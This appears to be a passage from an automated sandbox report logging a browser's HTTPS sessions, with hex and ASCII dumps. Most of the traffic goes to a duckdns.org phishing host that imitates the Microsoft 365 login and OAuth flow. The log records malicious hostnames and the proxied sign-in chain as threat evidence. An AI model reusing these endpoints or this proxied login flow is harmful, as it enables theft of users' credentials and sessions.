                                                                                                          2024-12-24 19:57:19 UTC16384INData Raw: 6f 72 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 79 6f 75 74 20 2a 3a 62 65 66 6f 72 65 2c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 2e 65 64 69 74 6f 72 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 79 6f 75 74 20 2a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 69 6e 68 65 72 69 74 3b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 74 69 6e 67 46 6f 72 6d 20 68 31 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 5c 6e 20
                                                                                                          Data Ascii: or-control-layout *:before,\n .editor-control-layout *:after {\n box-sizing: inherit;\n }\n\n .marketingForm h1 {\n color: #000;\n margin: 0px;\n padding: 0px;\n
                                                                                                          2024-12-24 19:57:19 UTC16384INData Raw: 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 2e 74 77 6f 4f 70 74 69 6f 6e 46 6f 72 6d 46 69 65 6c 64 42 6c 6f 63 6b 20 64 69 76 2e 74 77 6f 6f 70 74 69 6f 6e 5f 63 68 65 63 6b 62 6f 78 20 64 69 76 20 6c 61 62 65 6c 2c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 2e 74 77 6f 4f 70 74 69 6f 6e 46 6f 72 6d 46 69 65 6c 64 42 6c 6f 63 6b 20 64 69 76 2e 74 77 6f 6f 70 74 69 6f 6e 5f 63 68 65 63 6b 62 6f 78 20 64 69 76 20 6c 61 62 65 6c 20 64 69 76 2c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 73 65 6e 74 42 6c 6f 63 6b 20 64 69 76 20 6c 61 62 65 6c 20 70 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 5c 22 53 65 67 6f 65 20 55 49 5c 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 5c 6e 20
                                                                                                          Data Ascii: \n .twoOptionFormFieldBlock div.twooption_checkbox div label,\n .twoOptionFormFieldBlock div.twooption_checkbox div label div,\n .consentBlock div label p {\n font-family: \"Segoe UI\", Arial, sans-serif;\n
                                                                                                          2024-12-24 19:57:19 UTC6974INData Raw: 4f 49 36 68 50 6b 39 61 44 69 46 48 4a 63 33 6e 4d 69 72 4b 45 52 67 45 50 64 37 46 4b 4b 67 69 79 35 44 45 6e 33 2b 35 4a 73 72 41 66 48 4e 74 66 6a 56 52 4c 75 63 54 50 54 61 43 41 31 72 78 46 56 7a 36 41 58 38 79 59 73 49 55 6c 58 6f 4d 71 62 50 57 46 55 65 58 46 31 43 79 71 7a 37 45 6a 31 50 41 58 4e 42 73 31 42 31 74 73 4b 57 4b 70 73 58 30 79 46 68 73 6c 54 65 74 4c 34 6d 4c 38 73 34 6a 32 66 79 73 6c 54 62 6a 62 54 37 56 61 32 56 37 47 43 47 35 75 6b 68 66 74 69 6a 58 64 73 6f 51 68 47 6d 7a 53 49 34 51 68 48 47 68 56 75 66 7a 34 51 4a 2f 76 36 48 75 67 36 64 4b 30 45 4b 33 59 75 4d 38 2f 33 4c 78 35 68 33 5a 30 53 54 79 77 65 35 35 6f 78 52 65 6a 4d 35 51 6f 34 61 41 74 5a 38 65 54 42 75 57 70 36 64 6c 33 49 58 67 66 6e 6e 4c 70 79 7a 42 43 46 63
                                                                                                          Data Ascii: OI6hPk9aDiFHJc3nMirKERgEPd7FKKgiy5DEn3+5JsrAfHNtfjVRLucTPTaCA1rxFVz6AX8yYsIUlXoMqbPWFUeXF1Cyqz7Ej1PAXNBs1B1tsKWKpsX0yFhslTetL4mL8s4j2fyslTbjbT7Va2V7GCG5ukhftijXdsoQhGmzSI4QhHGhVufz4QJ/v6Hug6dK0EK3YuM8/3Lx5h3Z0STywe55oxRejM5Qo4aAtZ8eTBuWp6dl3IXgfnnLpyzBCFc


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          39192.168.2.44986620.117.200.1914435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:21 UTC765OUTGET / HTTP/1.1
                                                                                                          Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          Connection: keep-alive
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda
                                                                                                          2024-12-24 19:57:22 UTC20INHTTP/1.1 302 Found
                                                                                                          2024-12-24 19:57:22 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                          Data Ascii: Cache-Control: no-cache, no-store
                                                                                                          2024-12-24 19:57:22 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                          Data Ascii: Connection: close
                                                                                                          2024-12-24 19:57:22 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                          2024-12-24 19:57:22 UTC37INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 32 34 20 44 65 63 20 32 30 32 34 20 31 39 3a 35 37 3a 32 31 20 47 4d 54 0d 0a
                                                                                                          Data Ascii: Date: Tue, 24 Dec 2024 19:57:21 GMT
                                                                                                          2024-12-24 19:57:22 UTC13INData Raw: 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a
                                                                                                          Data Ascii: Expires: -1
                                                                                                          2024-12-24 19:57:22 UTC82INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 76 65 7a 7a 6a 78 6b 64 2e 63 65 63 63 64 79 72 73 76 68 68 79 6d 66 64 77 6e 66 77 67 68 68 62 70 78 70 72 71 73 62 79 6a 73 79 74 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 2f 6c 6f 67 69 6e 0d 0a
                                                                                                          Data Ascii: Location: https://vezzjxkd.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/login
                                                                                                          2024-12-24 19:57:22 UTC101INData Raw: 4e 65 6c 3a 20 7b 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 73 22 2c 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 30 31 2c 22 66 61 69 6c 75 72 65 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 7d 0d 0a
                                                                                                          Data Ascii: Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                          2024-12-24 19:57:22 UTC41INData Raw: 50 33 70 3a 20 43 50 3d 22 44 53 50 20 43 55 52 20 4f 54 50 69 20 49 4e 44 20 4f 54 52 69 20 4f 4e 4c 20 46 49 4e 22 0d 0a
                                                                                                          Data Ascii: P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                          2024-12-24 19:57:22 UTC18INData Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a
                                                                                                          Data Ascii: Pragma: no-cache
                                                                                                          2024-12-24 19:57:22 UTC50INData Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                                                                          Data Ascii: Referrer-Policy: strict-origin-when-cross-origin


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          40192.168.2.44987220.117.200.1914435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:23 UTC774OUTGET /login HTTP/1.1
                                                                                                          Host: vezzjxkd.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          Connection: keep-alive
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda
                                                                                                          2024-12-24 19:57:24 UTC20INHTTP/1.1 302 Found
                                                                                                          2024-12-24 19:57:24 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                          Data Ascii: Cache-Control: no-cache, no-store
                                                                                                          2024-12-24 19:57:24 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                          Data Ascii: Connection: close
                                                                                                          2024-12-24 19:57:24 UTC24INData Raw: 43 6f 6e 74 65 6e 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 0d 0a
                                                                                                          Data Ascii: Content-Encoding: gzip
                                                                                                          2024-12-24 19:57:24 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                          2024-12-24 19:57:24 UTC37INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 32 34 20 44 65 63 20 32 30 32 34 20 31 39 3a 35 37 3a 32 34 20 47 4d 54 0d 0a
                                                                                                          Data Ascii: Date: Tue, 24 Dec 2024 19:57:24 GMT
                                                                                                          2024-12-24 19:57:24 UTC865INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 6f 33 36 35 2e 63 65 63 63 64 79 72 73 76 68 68 79 6d 66 64 77 6e 66 77 67 68 68 62 70 78 70 72 71 73 62 79 6a 73 79 74 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 2f 63 6f 6d 6d 6f 6e 2f 6f 61 75 74 68 32 2f 76 32 2e 30 2f 61 75 74 68 6f 72 69 7a 65 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 26 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 25 32 46 6c 61 6e 64 69 6e 67 76 32 26 72 65 73 70 6f 6e 73 65 5f 74 79 70 65 3d 63 6f 64 65 25 32 30 69 64 5f 74 6f 6b 65 6e 26 73 63 6f 70 65 3d 6f 70 65 6e 69 64 25 32 30 70 72 6f 66 69 6c 65 25 32
                                                                                                          Data Ascii: Location: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%2
                                                                                                          2024-12-24 19:57:24 UTC50INData Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                                                                          Data Ascii: Referrer-Policy: strict-origin-when-cross-origin
                                                                                                          2024-12-24 19:57:24 UTC25INData Raw: 52 65 71 75 65 73 74 2d 43 6f 6e 74 65 78 74 3a 20 61 70 70 49 64 3d 0d 0a
                                                                                                          Data Ascii: Request-Context: appId=
                                                                                                          2024-12-24 19:57:24 UTC114INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4f 48 2e 44 43 41 66 66 69 6e 69 74 79 3d 4f 48 2d 73 75 6b 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 57 65 64 2c 20 32 35 20 44 65 63 20 32 30 32 34 20 30 33 3a 35 37 3a 32 34 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a
                                                                                                          Data Ascii: Set-Cookie: OH.DCAffinity=OH-suk; Path=/; Expires=Wed, 25 Dec 2024 03:57:24 GMT; HttpOnly; Secure; SameSite=None
                                                                                                          2024-12-24 19:57:24 UTC138INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4f 48 2e 46 4c 49 44 3d 66 65 61 31 62 36 30 62 2d 65 39 37 64 2d 34 30 34 31 2d 38 37 34 65 2d 66 33 61 62 66 39 62 30 64 65 39 35 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 57 65 64 2c 20 32 34 20 44 65 63 20 32 30 32 35 20 31 39 3a 35 37 3a 32 34 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a
                                                                                                          Data Ascii: Set-Cookie: OH.FLID=fea1b60b-e97d-4041-874e-f3abf9b0de95; Path=/; Expires=Wed, 24 Dec 2025 19:57:24 GMT; HttpOnly; Secure; SameSite=None


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          41192.168.2.44987935.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:26 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 682
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:57:26 UTC682OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:57:26 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:57:26 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          42192.168.2.44987820.117.200.1914435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:26 UTC1853OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 HTTP/1.1
                                                                                                          Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          Connection: keep-alive
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; fpc=AhZw6wgefU5EjPVIkl7TY3A; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe4rBdDu3QHLdW6yNeJI5LVPiJ0tNgB7pqxbW6BbDWk8T4ccOxwecZ4sYLrneDePpy33L9HL_mZPxYc-iiY1ghlJx7MsEHw-C8NTDJuRS3Nhwmvt3vK19idGqossesOetsct7vSWuLkhs4N2at-juuviXUEFgj1dGy1x8gpSHefjUgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
                                                                                                          2024-12-24 19:57:26 UTC17INHTTP/1.1 200 OK
                                                                                                          2024-12-24 19:57:26 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                          Data Ascii: Cache-Control: no-cache, no-store
                                                                                                          2024-12-24 19:57:26 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                          Data Ascii: Connection: close
                                                                                                          2024-12-24 19:57:26 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                          2024-12-24 19:57:26 UTC37INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 32 34 20 44 65 63 20 32 30 32 34 20 31 39 3a 35 37 3a 32 35 20 47 4d 54 0d 0a
                                                                                                          Data Ascii: Date: Tue, 24 Dec 2024 19:57:25 GMT
                                                                                                          2024-12-24 19:57:26 UTC13INData Raw: 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a
                                                                                                          Data Ascii: Expires: -1
                                                                                                          2024-12-24 19:57:26 UTC158INData Raw: 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 3e 3b 20 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 3b 20 63 72 6f 73 73 6f 72 69 67 69 6e 2c 3c 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 3e 3b 20 72 65 6c 3d 64 6e 73 2d 70 72 65 66 65 74 63 68 2c 3c 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 3e 3b 20 72 65 6c 3d 64 6e 73 2d 70 72 65 66 65 74 63 68 0d 0a
                                                                                                          Data Ascii: Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin,<https://aadcdn.msauth.net>; rel=dns-prefetch,<https://aadcdn.msftauth.net>; rel=dns-prefetch
                                                                                                          2024-12-24 19:57:26 UTC101INData Raw: 4e 65 6c 3a 20 7b 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 73 22 2c 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 30 31 2c 22 66 61 69 6c 75 72 65 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 7d 0d 0a
                                                                                                          Data Ascii: Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                          2024-12-24 19:57:26 UTC41INData Raw: 50 33 70 3a 20 43 50 3d 22 44 53 50 20 43 55 52 20 4f 54 50 69 20 49 4e 44 20 4f 54 52 69 20 4f 4e 4c 20 46 49 4e 22 0d 0a
                                                                                                          Data Ascii: P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                          2024-12-24 19:57:26 UTC18INData Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a
                                                                                                          Data Ascii: Pragma: no-cache
                                                                                                          2024-12-24 19:57:26 UTC50INData Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                                                                          Data Ascii: Referrer-Policy: strict-origin-when-cross-origin


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          43192.168.2.44989020.117.200.1914435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:28 UTC2326OUTGET /s/82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda/0b62916e90a58b06d55d641ab5a9498315d5f8c709ae45fba0e8f54e3b669413.js HTTP/1.1
                                                                                                          Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
